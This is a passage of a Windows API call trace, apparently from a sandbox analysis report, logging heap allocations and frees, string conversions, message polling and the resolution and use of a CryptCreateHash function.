Size=0x4) returned 0x2e54ef8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0161.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0161.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.695] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0161.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0161.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0161.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0161.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0161.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0161.696] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0161.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0161.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0161.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0161.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0161.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0161.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0161.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0161.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0161.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0161.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0161.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0161.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0161.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0161.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0161.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0161.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.705] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0161.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0161.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e28 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0161.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0161.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0161.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0161.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0161.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0161.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0161.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0161.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0161.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0161.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54eb8 [0161.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.869] 